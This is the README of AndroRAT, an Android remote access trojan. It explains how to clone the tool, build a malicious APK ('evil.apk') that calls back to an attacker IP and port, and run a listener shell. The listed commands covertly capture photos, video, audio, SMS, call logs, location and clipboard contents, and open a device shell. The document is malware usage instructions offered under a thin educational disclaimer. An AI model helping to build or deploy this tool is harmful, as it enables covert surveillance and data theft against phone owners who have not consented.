DISCLAIMER: This software is meant for educational purposes only. I don't feel responsible for any malicious use of the app.
AndroRAT is a tool designed to give the control of the android system remotely and retrieve informations from it. Androrat is a client/server application developed in Java Android for the client side and the Server is in Python.
AndroRAT also works on Android 10 (Q) but some of the interpreter command will be unstable.
AndroRAT requires Python (> 3.6) and JAVA (or Android Studio)
git clone https://github.com/karma9874/AndroRAT.git
- for building the android apk--shell
- getting an interactive shell of the device
python androRAT.py --build [flags]
-i, --ip Attacker IP address (required)
-p, --port Attacker port number (required)
-o, --output Name for the apk file (optional)
Or you can manually build the apk by importing Android Code folder to Android Studio and changing the IP address and port number in config.java file and then you can generate the signed apk from Android Studio -> Build -> Generate Signed APK(s)
python androRAT.py --shell [flags]
-i, --ip Listner IP address
-p, --port Listner port number
After running the shell
mode you will get an interpreter of the device
Commands which can run on the interpreter
deviceInfo --> returns basic info of the device
camList --> returns cameraID
takepic [cameraID] --> Takes picture from camera
startVideo [cameraID] --> starts recording the video
stopVideo --> stop recording the video and return the video file
startAudio --> starts recording the audio
stopAudio --> stop recording the audio
getSMS [inbox|sent] --> returns inbox sms or sent sms in a file
getCallLogs --> returns call logs in a file
shell --> starts a sh shell of the device
vibrate [number_of_times] --> vibrate the device number of time
getLocation --> return the current location of the device
getIP --> returns the ip of the device
getSimDetails --> returns the details of all sim of the device
clear --> clears the screen
getClipData --> return the current saved text from the clipboard
getMACAddress --> returns the mac address of the device
exit --> exit the interpreter
To build the apk:
python androRAT.py --build -i 192.169.x.x -p 8000 -o evil.apk
To get the interpreter:
python androRAT.py --shell -i -p 8000
- Generating APK
AndroRAT is licensed under MIT license. take a look at the LICENSE for more information.